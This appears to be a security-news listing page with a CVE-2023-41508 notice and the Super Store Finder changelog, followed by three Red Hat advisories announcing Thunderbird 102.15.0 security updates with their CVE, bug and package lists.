A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel.

**3.7** (Last updated: 24 Aug 2023)

*   Upgrade admin login library. Fixed a vulnerability issue if default admin username is not changed to something else.
*   Removed predefined field values at admin login page
*   Frontend query enhanced security update

**3.6** (Last updated: 27 Nov 2022)

*   Added lat and lng url parameter to be passed to store locator map
*   Added location url parameter to be passed to store locator map

**3.5** (Last updated: 15 Jun 2022)

*   Added Approve/Disapprove toggler at admin store listing page

**3.4** (Last updated: 7 May 2021)

*   Fixed PHP deprecated method warning message from showing

**3.3** (Last updated: 12 Dec 2019)

*   Added GDPR Compliant settings
*   Updated send mail charset header

**3.2** (Last updated: 20 Jul 2019)

*   Added Google Geocoding key field (for import) at admin settings page

**3.1** (Last updated: 20 Mar 2019)

*   Added category url parameter

**3.0** (Last updated: 17 Aug 2018)

*   Update installation file to support HTTPS / SSL

**2.9** (Last Update  6 June 2016)

*   Updated latest Geo IP Database (More Info)

**2.9.1** (Last Update 28 June 2016)

*   Added Google API key field at admin settings page

**2.9.2** (Last Update 21 July 2016)

*   Fixed double Google Maps API call at Request Add Store page

**2.9.3** (Last Update 31 Mar 2017)

*   Added API key in import/geocode module

**2.9.4** (Last Update 8 Jul 2018)

*   Removed sensor parameter from Google Maps API calls

**2.8 \* MAJOR UPDATE \*** (Last Update 11 Jan 2016)

*   Updated all codes to mysqli
*   Added print button at directions page
*   added contact form

**2.8.1** (Last Update 1 April 2016)

*   Added Thumbnail Previewer for image uploader

**2.7** (Last Update 27 June 2015)

*   Added embed video functionality (upgrade instructions here)

**2.6** (Last Update 21st June 2015)

*   You can now paste custom google maps style code (i.e snazzymaps.com) via admin settings page
*   Added sort by approved status for stores in admin area

**2.5** (Last Update 7th June 2015)

*   Added search box widget
*   Added language translation for Street View, Zoom here, Directions

**2.4 \* MAJOR UPDATE \***(Last Update 22nd Feb 2015)

*   Added settings page at Admin Area (More Details)
*   Set General settings such as default distance, language, zoom levels, geo ip enabled/disabled, default location, etc
*   Set Styles settings such as top bar color, buttons color, results list color, map hue color, etc

**2.3** version 2.3 (Last Update 3rd Feb 2015)

*   Fixed miles and km issue during finding stores
*   Fixed radius issue in responsive version
*   Added default distance unit at installation page

**2.2** version 2.2 (Last Update 31st Jan 2015)

*   Fixed scrolling list issue that scrolls the entire page
*   Added scroll easing effect
*   Enhanced Request Add Store page for the responsive version
*   Enhanced embed feature for responsive and Compact themes

**2.1** (Last updated: 29 Jan 2015)

*   Added 2 steps Installation Tool for Super Store Finder

**2.0** (Last updated: 2 Jan 2015)

*   Added Geo IP functionality that able to detect visitor City and Country.
*   Fixed drag and drop longitude detection at Add / Edit Store page due to Google Maps Update

**1.9** (Last updated: 4 Sept 2014)

*   Drag and Drop Marker is now available at request add store, add new store and edit store page.

**1.9.1** (Last updated: 18 Nov 2014)

*   Maps at store finder, add store, request add store and edit stop not displaying due to Geo IP public javascript provided by maxmind no longer working as they start charging. Patch has been added to fix the issue, for more info visit the FAQ pagehttp://codecanyon.net/item/super-store-finder/3630922/faqs/22312

**1.8** (Last updated: 15 Aug 2014)

*   Added import and geo code stores from csv list at admin area
*   Added backup export stores at admin area
*   Added restore stores feature at admin area
*   Video for Import/Geocode CSV List, Backup and Restore available here.

**1.8.1** (Last updated: 24 Aug 2014)

*   Added append options for CSV import & geocode

**1.7** (Last updated: 13 Aug 2014)

*   Fixed result scroll to view upon clicking marker
*   Fixed bouncing markers issue
*   Replace obsolete mktime function at admin login page
*   Fixed pagination in category page
*   Fixed pagination in admin user list page

**1.6** (Last updated: 25 Mar 2014)

*   Fixed distance radius more than 1000 miles/km

**1.6.1** (Last updated: 11 April 2014)

*   Fixed distance bug in Firefox non EN language settings

**1.5** (Last updated: 28 Jan 2013)

*   Updated to jQuery 1.9
*   Responsive version is now available for download
*   Fixed pagination bug in admin
*   Fixed misc javascript and bootstrap conflict error

**1.5.1** (Last updated: 28 Jan 2013)

*   Improve the layout of responsive version

**1.5.2** (Last updated: 30 Jan 2013)

*   Added responsive embed code for templates with dynamic sizes

**1.5.3** (Last updated: 16 Mar 2013)

*   Fixed transparency for png category icon
*   Add store search filter in administrator’s area

**1.5.4** (Last updated: 27 Mar 2013)

*   Fixed address list inconsistency in Firefox and Chrome browser

**1.5.5** (Last updated: 14 Mar 2014)

*   Fixed text encoding issues
*   Fixed embed code in responsive version
*   Fixed front end CSS for responsive version

**1.5.6** (Last updated: 15 Mar 2014)

*   Fixed distance sorting issue (solution in FAQ here)

**1.5.7** (Last updated: 17 Mar 2014)

*   \-Multi-language for no nearby stores notification fix

**1.4** (Last updated: 28 Dec 2012)

*   Google Maps Direction feature is now live and available for download

**1.3** (Last updated: 27 Dec 2012)

*   Added Street view link at info window
*   Added Zoom here link at info window
*   Searching store by category is now available
*   Upload and customize category icons

**1.2** (Last updated: 18 Dec 2012)

*   Supports multi-language with 8 language file translations included
*   Users are able to set default language from config file (config.inc.php)
*   Languages Pack download page is now available (Email me if you would like to contribute your translation; refer FAQ for guide)
*   Fixed Store Finder misc CSS issues
*   Email notification is now in various languages
*   Description will now be shown at front end unless blank

**1.2.1** (Last updated: 18 Dec 2012)

*   Super Store Finder Import Tool using CSV is now available
*   Added pagination to store list at backend
*   Added pagination to user admin list at backend
*   Added Arabic language

**1.2.2** (Last updated: 20 Dec 2012)

*   Fixed pagination showing extra empty page

**1.2.3** (Last updated: 21 Dec 2012)

*   Fixed floating map covering form in add / edit store page in admin area

**1.1** (Last updated: 16 Dec 2012)

*   Fixed misc Javascript and CSS Issues

CVE-2023-41508: Patch Notes (Last updated: 25 Aug 2023)

Red Hat Security Advisory 2023-4955-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4955-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4955  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-102.15.0-1.el9_2.src.rpm

aarch64:  
thunderbird-102.15.0-1.el9_2.aarch64.rpm  
thunderbird-debuginfo-102.15.0-1.el9_2.aarch64.rpm  
thunderbird-debugsource-102.15.0-1.el9_2.aarch64.rpm

ppc64le:  
thunderbird-102.15.0-1.el9_2.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el9_2.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el9_2.ppc64le.rpm

s390x:  
thunderbird-102.15.0-1.el9_2.s390x.rpm  
thunderbird-debuginfo-102.15.0-1.el9_2.s390x.rpm  
thunderbird-debugsource-102.15.0-1.el9_2.s390x.rpm

x86_64:  
thunderbird-102.15.0-1.el9_2.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el9_2.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9itbAAoJENzjgjWX9erEpP4P/33j6g2oK58st/oGwjZ2Nndy  
AJDc/GeHuHSmeIZXGo6FkLGlZpxS/x0tV4VRxEQcALxdQwhMWPevUv8Y3wg3Vwft  
OKOgKC7iXWsNY5ljQXBt+bjdFoJtYuIad2AJCNaYXMvthdgHhG6O77pY+H2qUH6z  
j2ej40Kwah5ZcxkGLP02yfyb+gA69uqBktkEKdY5ETDyM69LgtKkGIU1pr1CgF3f  
NqGo0JXRvvjcNbVbj+3HkVCQEfgAz9wiLVJ1lFSGGqwU1gCQaaE3xit4S1Mgcdhb  
Uz8H3o1ZXLY1L6rZYzSpDKHCHCWteIxDT+49KTkDGzs/MjGNzOXiqm8Xe+Kh/TVY  
ISJq0vZROI0j54IjJWdLvUlCflf0NGZjSoqQZTes5s1S+EbLM6sCi97Vibq8IaQ/  
xQ+iQ/rTnS/lVrGPSsNs3x/SeBRaIfPqVIzBGJfgvaawnrZABWsmlNSHeneuQPa8  
OknUlzhWlvL013jaqT6CtvuwShKRILxEya+urGIwWM17XDYrClqpydIxTeHGfyhy  
rKVPBjjdOX2LBVSanZOw7KmpGy0xbdrSXCT/WWy/F3jMrH0R9aXeYe1OTBi/m03s  
fn4rTx71LfQgPQslSfA8AsOFBdxhHEUxkLxz+XA2j7HX1TTTfPV1gQiA0BsKfCHg  
ZOhhy4otKX3VHoMel4V7  
=tYnO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4955-01

Red Hat Security Advisory 2023-4946-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4946-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4946  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.15.0-1.el8_2.src.rpm

x86_64:  
thunderbird-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.15.0-1.el8_2.src.rpm

ppc64le:  
thunderbird-102.15.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.15.0-1.el8_2.src.rpm

x86_64:  
thunderbird-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9itZAAoJENzjgjWX9erEQrkP/iKzWe4qFGWp8qncyFNdVq66  
NL7aEVme8hVwzfY9Q/Bddw2R+VwRQbj4ON3z1j49wNG2qGg9wJijQRbov6WuGgP7  
lhtE/bD0bxoXhTASyVV38nvXXHntRVmDmphGsI64V3CeNPpQxT64y85nLPC9eVcb  
acCfW4HoetcQMKR04VQrdBKo7NaIkkeyKFKpIt0XCObLfoyjGAx8l8jBJQMop4OW  
8mOxwzLy+gLwTfexI1zHX6UtnkceH5QsrUabYCUpzFtQsZFPD1vaCTQp9s6G+GuL  
nOKVTlgzh211mSTh/VhwBrPDAQfbMNcWO52dBENBv/M1aC/rQluJ0xTnbvnVa2gi  
yhK8pNS0glfsETEqWAm2Def7UQC5DLtOHhvVEKBlqtQ28MPjw+BGCxyaGka0rlYk  
7NwiNpS+3z5nRBTS+vwIiuiTHUK8BVpvL6CJd2mxgcMxRxRH6DG9mTAhD3VbG5Gx  
Snv18wvTWlj02gaKBNJlV7QBN8m11tu9JQ32ViHMYTSY/dhCku8d5MDco24WQHyD  
OMG196KxXrG6XKmnMZVlss43Al5EVb709Re3UG2C0agMpc/XbMueRuPonP55BpwB  
edOjqbCbmhRURhKCXWCL9tBipVUZZHhyCLXvOq7zNmxuQlHuJPXT+3d2Uj4PI7ZQ  
KoRQ8hkP2/wQvHiCV31t  
=2uhL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4946-01

Red Hat Security Advisory 2023-4956-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4956-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4956  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v.8.4):

Source:  
thunderbird-102.15.0-1.el8_4.src.rpm

x86_64:  
thunderbird-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v.8.4):

Source:  
thunderbird-102.15.0-1.el8_4.src.rpm

aarch64:  
thunderbird-102.15.0-1.el8_4.aarch64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.aarch64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.aarch64.rpm

ppc64le:  
thunderbird-102.15.0-1.el8_4.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.ppc64le.rpm

s390x:  
thunderbird-102.15.0-1.el8_4.s390x.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.s390x.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.s390x.rpm

x86_64:  
thunderbird-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v.8.4):

Source:  
thunderbird-102.15.0-1.el8_4.src.rpm

aarch64:  
thunderbird-102.15.0-1.el8_4.aarch64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.aarch64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.aarch64.rpm

ppc64le:  
thunderbird-102.15.0-1.el8_4.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.ppc64le.rpm

s390x:  
thunderbird-102.15.0-1.el8_4.s390x.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.s390x.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.s390x.rpm

x86_64:  
thunderbird-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el8_4.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9itMAAoJENzjgjWX9erEYD0P/33Pwxlg+FpKuv9QorsSObyq  
9oeXNJkM2snoG0o76zPwtVPPxgu9uxwvgeHV9yf3Z5eecO68OzxmDefdiNkLdHEr  
DQ9P/swHvJZyZjqXsgphv8B6o4fRyaYh5+ULNRt/8uifrvPMR3WJr4xuuXSxjGkI  
K6PNPgxglQfmcTlPsW/Uc0jfly6FyRYOssV8NlDFvIyR+ZvSUptIZDQq2jhqdXGc  
Kv7K8BsdoaCoTSO25p9KJgM3SAr+rZuz2/jQ/CFv5Me4UMhEQSa55s/LSr43cN8a  
9I+xjuK0/eBnYM5A3k5XfO6ueLmd3v0ecLYx6xUViwY07aoiudhYU1Zk794gpjFt  
JdyqU9x5wY9UKF5Svz4xb1mNitgLNfLL6qgf4B9l8FfQmJY8dP5S9F89ltS8Scwb  
rPMyTAn4rDmQ87BU2AA9cvps1hXcPyTWmnO3VH8kion4BbiLKCZuwN5fb0v0sbb/  
4RYi13u0RHJ3jE/uYGCUcw/a6tJ0sKbNHWnTWMfkYZI5Is85OmEYqjNHmQogtUfZ  
drbGqn8DOdIZE7qaypY39PO1U4RIRLNt6LSp5ctr/Gk0nHe62JlPOKZiEtX7YOOh  
LLp55Hrf6uJgiipALL+AnBXjpLPaz8JQ/rWeRWkOZBXTJedDy6lfIWXBQMtxTgqR  
TLWzlOlvAbfLvv6QVLWy  
=vY67  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4956-01

